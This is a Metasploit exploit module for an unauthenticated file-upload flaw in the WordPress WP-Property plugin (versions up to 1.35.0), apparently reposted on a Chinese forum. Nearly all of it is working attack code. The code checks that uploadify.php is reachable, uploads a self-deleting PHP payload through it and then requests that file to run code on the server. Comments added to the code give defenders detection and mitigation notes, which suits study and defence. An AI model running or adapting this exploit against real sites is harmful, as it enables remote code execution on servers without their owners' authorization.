WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

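# Metasploit module for the unauthenticated file upload in the WordPress
# WP-Property plugin. The module description gives the affected range as
# <= 1.35.0; references listed below: OSVDB 82656, BID 53787, EDB 18987.
#
# Root cause as described by the module: the Uploadify handler bundled at
#   wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
# accepts a multipart upload without authentication, and the stored file can
# then be requested over HTTP, so an uploaded .php file runs on the server.
#
# Notes for defenders and reviewers:
# * Detection: look in web-server logs for a POST to the uploadify.php path
#   above that carries no authenticated session, followed by a GET for a
#   .php file whose path was returned in the POST response body.
# * The payload is built with :unlink_self => true; presumably the dropped
#   file removes itself after running, so a missing file on disk is not
#   evidence that nothing happened. Rely on request logs instead.
# * Mitigation: move the plugin off the affected range or remove the bundled
#   Uploadify script, and deny script execution in directories that accept
#   uploads.
#
# NOTE(review): the source listing was mangled by the hosting forum; the
# second mixin appeared as "Msf::Exploit: hpEXE" and is restored here to
# Msf::Exploit::PhpEXE, matching the require of 'msf/core/exploit/php_exe'.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets) and the single
  # TARGETURI option, which defaults to '/wordpress'.
  #
  # @param info [Hash] metadata overrides merged in by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Non-intrusive probe: issues one GET for the bundled uploadify.php.
  #
  # A 200 only shows that the script is reachable; it does not confirm the
  # plugin version or that uploads are accepted, hence Appears rather than
  # a stronger result. Anything else (no response, other status) is Unknown.
  #
  # @return [Exploit::CheckCode::Appears, Exploit::CheckCode::Unknown]
  def check
    uri = target_uri.path
    # Build a new string instead of appending in place to the value returned
    # by target_uri.path.
    uri += '/' unless uri.end_with?('/')

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    return Exploit::CheckCode::Unknown unless res && res.code == 200

    Exploit::CheckCode::Appears
  end

  # Uploads the PHP stub through uploadify.php and then requests it.
  #
  # Request sequence visible to a defender:
  #   1. POST multipart/form-data to .../third-party/uploadify/uploadify.php
  #      with a "Filedata" part (five random letters + ".php") and a "folder"
  #      part naming the uploadify directory.
  #   2. GET of the path that the POST response body returned.
  #
  # Calls fail_with(UnexpectedReply) when the POST gets no response, a
  # non-200 status, or a body that does not mention the uploaded file name.
  def exploit
    uri = target_uri.path
    uri += '/' unless uri.end_with?('/')

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a boundary marker at the start of a line
    # in the serialized message.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    unless res && res.code == 200 && res.body =~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The handler's response body is used verbatim as the path to request.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end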
不要问我这写的是什么 怎么利用 我是说msf.